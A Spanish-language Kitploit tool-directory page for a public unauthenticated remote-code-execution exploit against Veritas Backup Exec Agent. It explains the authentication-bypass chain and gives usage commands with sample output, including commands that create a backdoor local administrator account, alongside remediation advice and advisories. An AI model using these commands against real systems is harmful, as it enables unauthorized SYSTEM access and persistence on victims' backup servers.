Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-27876 — Exploit de RCE sin autenticación para el Agente de Veritas Backup Exec (CVE-2021-27876/77/78): evasión de autenticación SHA hasta SYSTEM vía NDMP | Kitploit
Herramientas/GitHubGitHub/wingerbijay/cve-2021-27876
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlAutenticación
GitHubwingerbijay/cve-2021-27876

CVE-2021-27876

Exploit de RCE sin autenticación para el Agente de Veritas Backup Exec (CVE-2021-27876/77/78): evasión de autenticación SHA hasta SYSTEM vía NDMP

Ver Repositorio
11hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-27876

Exploit de RCE sin autenticación para el agente de Veritas Backup Exec (CVE-2021-27876/77/78) — omisión de autenticación SHA hacia SYSTEM mediante NDMP

CVEs

CVEDescripciónCVSS 3.1
CVE-2021-27876Omisión de autenticación mediante manipulación del hash SHA en el protocolo NDMP9.8 Crítico
CVE-2021-27877Lectura arbitraria de archivos sin autenticación mediante NDMP9.8 Crítico
CVE-2021-27878Ejecución arbitraria de comandos del sistema operativo mediante NDMP_EXECUTE_COMMAND9.8 Crítico

Aviso: Veritas VTS21-003

Versiones afectadas

  • Backup Exec 16.x
  • Backup Exec 20.x
  • Backup Exec 21.x ≤ 21.2 (revisión del agente ≤ 9.3)

Corregido en: Backup Exec 21.3 y versiones posteriores.


Cómo funciona

El agente de Veritas Backup Exec escucha en TCP/10000 y utiliza el protocolo NDMP (Network Data Management Protocol). El exploit encadena tres debilidades:

  1. Abuso del handshake TLS — El agente solicita un CSR durante su negociación TLS personalizada. El exploit genera una CA local, firma el CSR del agente y completa el handshake, elevando el socket a TLS sin ningún secreto precompartido.

  2. Omisión de autenticación SHA (CVE-2021-27876) — La autenticación SHA de NDMP calcula SHA256('\x00' * 64 + challenge). Debido a que la contraseña se antepone como un bloque de 64 bytes relleno con ceros y no se realiza ninguna validación del material de la contraseña en el servidor, cualquier cliente puede autenticarse como Administrator sin conocer la contraseña.

  3. NDMP_EXECUTE_COMMAND (CVE-2021-27878) — Una vez autenticado, el tipo de mensaje NDMP_EXECUTE_COMMAND ejecuta comandos arbitrarios del sistema operativo como NT AUTHORITY\SYSTEM. La salida se redirige a C:\Windows\Temp\_be_out.txt y se lee de vuelta mediante NDMP_FILE_READ.


Requisitos

Python 3.8+

En las distribuciones modernas, Python está marcado como "gestionado externamente" (PEP 668), por lo que instale la dependencia en un entorno virtual:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate
pip install cryptography

Uso

python3 be_rce.py

Ejemplos:

root@kitploit:~
# Confirm SYSTEM access
python3 be_rce.py 10.10.10.50 "whoami"

# Dump hostname and domain
python3 be_rce.py 10.10.10.50 "whoami /all"

# Add a local admin
python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"

Sample output:

[*] Connecting to 10.10.10.50:10000
[*] NDMP version: 9
[+] NDMP connection opened
[*] Generating CA certificate
[*] Got agent CSR (1024 bytes)
[*] Signed agent CSR and sent back
[*] SSL_HANDSHAKE CONNECT sent
[*] Upgrading to TLS
[+] TLS established
[*] Requesting SHA challenge
[*] Got 64-byte SHA challenge
[+] SHA authentication bypassed!
[*] Executing: whoami
[+] Command output:
────────────────────────────────────────
nt authority\system
────────────────────────────────────────

Remediación

  • Actualice el agente de Veritas Backup Exec a 21.3 o posterior en todos los hosts
  • Restrinja TCP/10000 a los hosts autorizados de gestión de copias de seguridad mediante el firewall del host y las ACL de red
  • Audite todos los hosts que ejecutan el agente de Backup Exec en su entorno

Referencias

  • https://www.veritas.com/support/en_US/security/VTS21-003
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27876
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27877
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27878
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

Aviso Legal

Esta herramienta se proporciona únicamente para pruebas de penetración autorizadas e investigación de seguridad. Su uso contra sistemas sin permiso explícito por escrito es ilegal. El autor no acepta ninguna responsabilidad por un uso indebido.

Descargar herramienta